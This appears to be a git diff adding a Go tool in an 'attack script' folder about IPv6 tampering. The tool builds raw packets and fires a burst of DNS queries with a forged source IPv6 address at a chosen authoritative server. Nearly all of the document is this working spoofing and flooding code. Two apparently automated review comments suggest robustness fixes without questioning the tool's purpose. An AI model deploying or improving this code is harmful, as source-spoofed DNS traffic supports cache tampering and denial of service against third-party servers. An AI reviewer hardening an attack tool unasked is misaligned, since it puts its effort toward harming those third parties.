Diffstat (limited to 'att script/5_v6_篡改/code/src/flood')
-rw-r--r--att script/5_v6_篡改/code/src/flood/go.mod20
-rw-r--r--att script/5_v6_篡改/code/src/flood/go.sum38
-rw-r--r--att script/5_v6_篡改/code/src/flood/ipv6util.go103
-rw-r--r--att script/5_v6_篡改/code/src/flood/main.go192
4 files changed, 353 insertions, 0 deletions
diff --git a/att script/5_v6_篡改/code/src/flood/go.mod b/att script/5_v6_篡改/code/src/flood/go.mod
new file mode 100644
index 0000000..b55b38b
--- /dev/null
+++ b/att script/5_v6_篡改/code/src/flood/go.mod
@@ -0,0 +1,20 @@
+module flood
+
+go 1.21
+
+toolchain go1.21.4
+
+require (
+ github.com/google/gopacket v1.1.19
+ github.com/jackpal/gateway v1.0.13
+)
+
+require (
+ github.com/davecgh/go-spew v1.1.1 // indirect
+ github.com/pmezard/go-difflib v1.0.0 // indirect
+ github.com/stretchr/objx v0.5.0 // indirect
+ github.com/stretchr/testify v1.8.4 // indirect
+ golang.org/x/net v0.17.0 // indirect
+ golang.org/x/sys v0.13.0 // indirect
+ gopkg.in/yaml.v3 v3.0.1 // indirect
+)
diff --git a/att script/5_v6_篡改/code/src/flood/go.sum b/att script/5_v6_篡改/code/src/flood/go.sum
new file mode 100644
index 0000000..1cca74c
--- /dev/null
+++ b/att script/5_v6_篡改/code/src/flood/go.sum
@@ -0,0 +1,38 @@
+github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
+github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/google/gopacket v1.1.19 h1:ves8RnFZPGiFnTS0uPQStjwru6uO6h+nlr9j6fL7kF8=
+github.com/google/gopacket v1.1.19/go.mod h1:iJ8V8n6KS+z2U1A8pUwu8bW5SyEMkXJB8Yo/Vo+TKTo=
+github.com/jackpal/gateway v1.0.13 h1:fJccMvawxx0k7S1q7Fy/SXFE0R3hMXkMuw8y9SofWAk=
+github.com/jackpal/gateway v1.0.13/go.mod h1:6c8LjW+FVESFmwxaXySkt7fU98Yv806ADS3OY6Cvh2U=
+github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
+github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw=
+github.com/stretchr/objx v0.5.0 h1:1zr/of2m5FGMsad5YfcqgdqdWrIhu+EBEJRhR1U7z/c=
+github.com/stretchr/objx v0.5.0/go.mod h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpEOglKo=
+github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU=
+github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk=
+github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo=
+golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
+golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
+golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg=
+golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
+golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM=
+golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE=
+golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE=
+golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
+golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
+golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
+gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
+gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
diff --git a/att script/5_v6_篡改/code/src/flood/ipv6util.go b/att script/5_v6_篡改/code/src/flood/ipv6util.go
new file mode 100644
index 0000000..09245d3
--- /dev/null
+++ b/att script/5_v6_篡改/code/src/flood/ipv6util.go
@@ -0,0 +1,103 @@
+package main
+
+import (
+ "encoding/hex"
+ "fmt"
+ "net"
+ "os/exec"
+ "strings"
+ "syscall"
+ "unsafe"
+)
+
+type router struct {
+ ifaces []net.Interface
+ addrs []net.IP
+ v6 routeSlice
+}
+type routeSlice []*rtInfo
+
+type rtInfo struct {
+ // Dst net.IPNet
+ Gateway, PrefSrc net.IP
+ OutputIface uint32
+ Priority uint32
+}
+
+func getv6Gateway() (net.IP, error) {
+ rtr := &router{}
+
+ tab, err := syscall.NetlinkRIB(syscall.RTM_GETROUTE, syscall.AF_INET6)
+ if err != nil {
+ return nil, err
+ }
+
+ msgs, err := syscall.ParseNetlinkMessage(tab)
+ if err != nil {
+ return nil, err
+ }
+
+ for _, m := range msgs {
+ switch m.Header.Type {
+ case syscall.NLMSG_DONE:
+ break
+ case syscall.RTM_NEWROUTE:
+ // rtmsg := (*syscall.RtMsg)(unsafe.Pointer(&m.Data[0]))
+ attrs, err := syscall.ParseNetlinkRouteAttr(&m)
+ if err != nil {
+ return nil, err
+ }
+ routeInfo := rtInfo{}
+ rtr.v6 = append(rtr.v6, &routeInfo)
+ for _, attr := range attrs {
+ switch attr.Attr.Type {
+ // case syscall.RTA_DST:
+ // routeInfo.Dst.IP = net.IP(attr.Value)
+ // routeInfo.Dst.Mask = net.CIDRMask(int(rtmsg.Dst_len), len(attr.Value)*8)
+ case syscall.RTA_GATEWAY:
+ routeInfo.Gateway = net.IP(attr.Value)
+ case syscall.RTA_OIF:
+ routeInfo.OutputIface = *(*uint32)(unsafe.Pointer(&attr.Value[0]))
+ case syscall.RTA_PRIORITY:
+ routeInfo.Priority = *(*uint32)(unsafe.Pointer(&attr.Value[0]))
+ case syscall.RTA_PREFSRC:
+ routeInfo.PrefSrc = net.IP(attr.Value)
+ }
+ }
+ }
+ }
+ ips := []net.IP{}
+ for _, rt := range rtr.v6 {
+ if rt.Gateway != nil {
+ ips = append(ips, rt.Gateway)
+ }
+ }
+ return ips[0], nil
+}
+
+func getGatewayV6Mac(ifacename string, gwIP net.IP) (net.HardwareAddr, error) {
+ if debugOutput {
+ println("邻居发现--使用网卡接口为:" + ifacename)
+ }
+ out, err := exec.Command("ip", "-6", "neighbor", "show", "dev", ifacename).Output()
+ if err != nil {
+ println(err.Error())
+ } else {
+ outlines := strings.Split(string(out), "/n")
+ for _, line := range outlines {
+ linelist := strings.Split(line, " ")
+ // 与网关对应的MAC地址
+ if linelist[0] == gwIP.String() {
+
+ maclist := strings.Split(linelist[2], ":")
+ var macbyte []byte
+ for _, m := range maclist {
+ b, _ := hex.DecodeString(m)
+ macbyte = append(macbyte, b[0])
+ }
+ return net.HardwareAddr(macbyte), nil
+ }
+ }
+ }
+ return nil, fmt.Errorf("无法找到网关" + gwIP.String() + "对应的MAC地址")
+}
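Review bot: getv6Gateway ends with `return ips[0], nil`, which panics with an index-out-of-range error when no RTM_NEWROUTE message carried an RTA_GATEWAY attribute; it should return an error instead, e.g. `if len(ips) == 0 { return nil, fmt.Errorf("no IPv6 gateway in route table") }`. The RTA_OIF and RTA_PRIORITY cases read four bytes through `unsafe.Pointer(&attr.Value[0])` without checking `len(attr.Value) >= 4`; a length check followed by `binary.NativeEndian.Uint32(attr.Value)` (encoding/binary, available at the go 1.21 level this module declares) removes the unchecked unsafe read. getGatewayV6Mac indexes `linelist[2]` and `b[0]` without length checks and discards the hex.DecodeString error, so a short or malformed line of `ip` output crashes the process rather than reaching the function's error return. The `break` under `case syscall.NLMSG_DONE:` only leaves the switch, not the message loop, so it deserves either a labelled break or a comment saying the fall-through is intended.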
diff --git a/att script/5_v6_篡改/code/src/flood/main.go b/att script/5_v6_篡改/code/src/flood/main.go
new file mode 100644
index 0000000..be0f1b4
--- /dev/null
+++ b/att script/5_v6_篡改/code/src/flood/main.go
@@ -0,0 +1,192 @@
+package main
+
+import (
+ "errors"
+ "flag"
+ "fmt"
+ "math/rand"
+ "net"
+ "os"
+ "strconv"
+
+ "github.com/google/gopacket"
+ "github.com/google/gopacket/layers"
+ "github.com/google/gopacket/pcap"
+)
+
+// 各层的定义
+var ethernetLayer *layers.Ethernet
+var debugOutput = false
+var handle *pcap.Handle
+var repeatTime = 100
+
+func main() {
+ // 读取参数配置
+ ifaceNameArg := flag.String("i", "vmnet1", "用于发送查询包的网络端口")
+ sourceaddrArg := flag.String("saddr", "", "伪造报文的源地址")
+ targetaddrArg := flag.String("taddr", "", "目标权威的地址")
+ qnameArg := flag.String("q", "www.baidu.com.", "请求查询的域名")
+ debugOutputArg := flag.Bool("d", false, "debug模式输出")
+ flag.Parse()
+
+ // 指针->值
+ ifaceName := *ifaceNameArg
+ sourceaddr := *sourceaddrArg
+ targetaddr := *targetaddrArg
+ qname := *qnameArg
+ debugOutput = *debugOutputArg
+ defer os.Exit(0)
+
+ handle, _ = pcap.OpenLive(
+ ifaceName,
+ 65536,
+ true,
+ pcap.BlockForever,
+ )
+
+ // 构造MAC层
+ var srcmac net.HardwareAddr
+ var dstmac net.HardwareAddr
+ if ifaceName == "" {
+ ifaceName = "eth0"
+ }
+
+ // 源MAC
+ loiface, err := net.InterfaceByName(ifaceName)
+ if err != nil {
+ fmt.Println(err.Error())
+ }
+ srcmac = loiface.HardwareAddr
+ if debugOutput {
+ fmt.Println("源MAC地址为: " + srcmac.String())
+ }
+
+ // 目的MAC
+ // 获取网关地址
+ gwIP, _ := getv6Gateway()
+ fmt.Println("网关IPv6地址为:" + gwIP.String())
+ dstmac, err = GetGatewayIPv6Addr(loiface, gwIP)
+ if err != nil {
+ fmt.Println(err.Error())
+ }
+ if debugOutput {
+ fmt.Println("目的MAC地址为: " + dstmac.String())
+ }
+
+ // mac层包
+ ethernetLayer = &layers.Ethernet{
+ SrcMAC: srcmac,
+ DstMAC: dstmac,
+ EthernetType: layers.EthernetTypeIPv6,
+ }
+
+ // dns查询
+ for i := 0; i < repeatTime; i++ {
+ go sendDNSRequest(uint16(rand.Uint32()), qname, net.ParseIP(sourceaddr), net.ParseIP(targetaddr))
+ }
+ if debugOutput {
+ fmt.Println("已连续发送" + strconv.Itoa(repeatTime) + "个请求包到" + targetaddr)
+ }
+}
+
+func Send(handle *pcap.Handle, l ...gopacket.SerializableLayer) error {
+ opts := gopacket.SerializeOptions{
+ FixLengths: true,
+ ComputeChecksums: true,
+ }
+ buffer := gopacket.NewSerializeBuffer()
+ if err := gopacket.SerializeLayers(buffer, opts, l...); err != nil {
+ return err
+ }
+ err := handle.WritePacketData(buffer.Bytes())
+ if err != nil {
+ println(err.Error())
+ }
+ return nil
+}
+
+func GetIfaceAddr(iface *net.Interface) (net.IP, error) {
+ addrs, err := iface.Addrs()
+ if err != nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ var srcIP net.IP
+ for _, address := range addrs {
+ if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
+ if ipnet.IP.To16() != nil {
+ srcIP = ipnet.IP.To16()
+ break
+ }
+ }
+ }
+
+ if srcIP == nil {
+ return nil, errors.New("can not get ip address")
+ }
+
+ return srcIP, nil
+}
+
+func GetGatewayIPv6Addr(iface *net.Interface, gatewayIP net.IP) (net.HardwareAddr, error) {
+ gwMAC, err := getGatewayV6Mac(iface.Name, gatewayIP)
+ if err != nil {
+ fmt.Println(err.Error())
+ panic("")
+ }
+ return gwMAC, nil
+}
+
+func sendDNSRequest(id uint16, name string, resolverIP net.IP, authIP net.IP) {
+ if debugOutput {
+ fmt.Println("Send new DNS request", name, id, resolverIP.String(), authIP.String())
+ }
+ _sendDNSRequest(id, name, resolverIP, authIP, (layers.UDPPort)(rand.Uint32()), 53)
+}
+
+func _sendDNSRequest(id uint16, name string, src net.IP, dst net.IP, sport layers.UDPPort, dport layers.UDPPort) {
+ ipLayer := layers.IPv6{
+ FlowLabel: 1,
+ SrcIP: src,
+ DstIP: dst,
+ Version: 6,
+ HopLimit: 64,
+ NextHeader: layers.IPProtocolUDP,
+ //Flags: layers.IPv4DontFragment,
+ }
+ udpLayer := layers.UDP{
+ SrcPort: sport,
+ DstPort: dport,
+ }
+ dnsLayer := layers.DNS{
+ ID: id,
+ QR: false,
+ OpCode: 0,
+ AA: false,
+ TC: false,
+ RD: true,
+ RA: false,
+ Z: 0,
+ ResponseCode: 0,
+ QDCount: 1,
+ ANCount: 0,
+ NSCount: 0,
+ ARCount: 0,
+ Questions: []layers.DNSQuestion{{
+ Name: []byte(name),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ }},
+ Authorities: nil,
+ Additionals: nil,
+ }
+
+ err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
+ if err != nil {
+ fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go pos 0 error", err)
+ }
+ err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
+ if err != nil {
+ fmt.Println("can not send packet @ sendDNSRequest: ", err)
+ }
+}
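Review bot: main discards the errors from `pcap.OpenLive` and `getv6Gateway` (`handle, _ =`, `gwIP, _ :=`) and only prints the one from `net.InterfaceByName` before reading `loiface.HardwareAddr`, so a wrong interface name or missing capture privilege surfaces as a nil-pointer panic instead of a diagnostic. Each of these failures should stop the program with the error, e.g. `if err != nil { fmt.Fprintln(os.Stderr, err); os.Exit(1) }`, and the opened handle is never closed. Send prints a WritePacketData failure and still returns nil, and GetGatewayIPv6Addr calls `panic("")` although its signature has an error result; both should return the error so the caller sees it. GetGatewayIPv6Addr also returns a hardware address rather than an IPv6 address, so the name misleads. The exported functions have no doc comments, and a line such as `// GetGatewayIPv6Addr returns the link-layer address of the IPv6 gateway on iface.` would make the contract explicit.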